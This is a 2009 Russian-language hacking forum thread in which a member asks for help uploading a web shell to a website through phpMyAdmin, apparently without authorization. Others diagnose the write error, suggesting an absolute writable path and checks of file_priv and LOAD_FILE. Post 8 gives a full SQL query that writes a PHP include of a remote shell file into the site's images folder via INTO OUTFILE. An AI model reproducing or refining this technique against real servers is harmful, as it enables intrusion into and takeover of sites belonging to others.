HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.01.2009, 07:27
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682

Репутация: 30
По умолчанию

Ребята, такой вопрос.
Заливаю шелл через phpmyadmin
Выскакивает ошибка:
Цитата:
#1 - Can't create/write to file 'полный путь до папки/shell.php' (Errcode: 2)
В чем косяк? чмода не хвататет? или путь не правильный?
или еще чего-то?

Последний раз редактировалось Octave_Parango; 19.01.2009 в 13:43..
 
Ответить с цитированием

  #2  
Старый 19.01.2009, 07:33
preda1or
Участник форума
Регистрация: 27.10.2008
Сообщений: 278
Провел на форуме:
1495545

Репутация: 242
Отправить сообщение для preda1or с помощью ICQ
По умолчанию

Цитата:
Сообщение от Octave_Parango  
Ребята, такой вопрос.
Заливаю шелл через phpmyadmin
Выскакивает ошибка:


В чем косяк? чмода не хвататет? или путь не правильный?
или еще чего-то?
а почему ты думаешь что mysql на той же машине находится?)
 
Ответить с цитированием

  #3  
Старый 19.01.2009, 11:17
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Цитата:
Сообщение от Octave_Parango  
Ребята, такой вопрос.
Заливаю шелл через phpmyadmin
Выскакивает ошибка:


В чем косяк? чмода не хвататет? или путь не правильный?
или еще чего-то?
(Errcode: 2) - папка не существует.
 
Ответить с цитированием

  #4  
Старый 19.01.2009, 07:49
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682

Репутация: 30
По умолчанию

preda1or, a как проверить? на той или нет?
Об этом если честно чего-то не подумал.
 
Ответить с цитированием

  #5  
Старый 19.01.2009, 13:39
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
'/../../../../shell.php'
Ну правильно, чо это за пусть такой, ты же не "../etc/passwd" подбираешь, тут надо писать реальный абсолютный путь к папке с правами на запись
 
Ответить с цитированием

  #6  
Старый 19.01.2009, 13:43
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682

Репутация: 30
По умолчанию

to R1dex, странно вроде есть такая (: Попробую еще...
to Pashkela, да я полный пишу, просто скрыл путь, что бы не палиццо (: (поправил верхний пост)

Еще вопрос, полный путь у меня такой:

/var/www/vhosts/название сайта/httpdocs/

то есть в INTO OUTFILE так и пишем

/var/www/vhosts/название сайта/httpdocs/images/shell.php

при условии, что папка images имеет нужные нам права.

?

Последний раз редактировалось Octave_Parango; 19.01.2009 в 13:56..
 
Ответить с цитированием

  #7  
Старый 19.01.2009, 13:57
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Octave_Parango Запрос покажи полностью. Права есть? Вообще ошибка , как уже сказал R1dex, говорит об несуществующей дирректории. Именно путь, а не права, или что то ещё, но запрос давай посмотрим на всякий случай
 
Ответить с цитированием

  #8  
Старый 19.01.2009, 14:04
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682

Репутация: 30
По умолчанию

to jokester,

запрос такой:

CREATE TABLE `she` (`shl` TEXT NOT NULL) TYPE = MYISAM ; INSERT INTO `she` ( `shl` ) VALUES ('<?php include("http://название сайте/shell.txt") ?>'); SELECT `shl` FROM `she` INTO OUTFILE `/var/www/vhosts/название сайта/httpdocs/images/shell.php`; DROP TABLE `she`

Где-то накосячил? Да?
 
Ответить с цитированием

  #9  
Старый 19.01.2009, 14:08
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

Запрос вроде нормальный... Смотри права...
 
Ответить с цитированием

  #10  
Старый 19.01.2009, 14:15
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

.htaccess ни имеет никакого отношения.

По возврашаемому коду ошибки ясно что такой диры нет, что бы убедиться в этом попробуй LOAD_FILE какой нибудь файл из этой директории.
Кстати у тебя file_priv есть?

Последний раз редактировалось AkyHa_MaTaTa; 19.01.2009 в 14:27..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ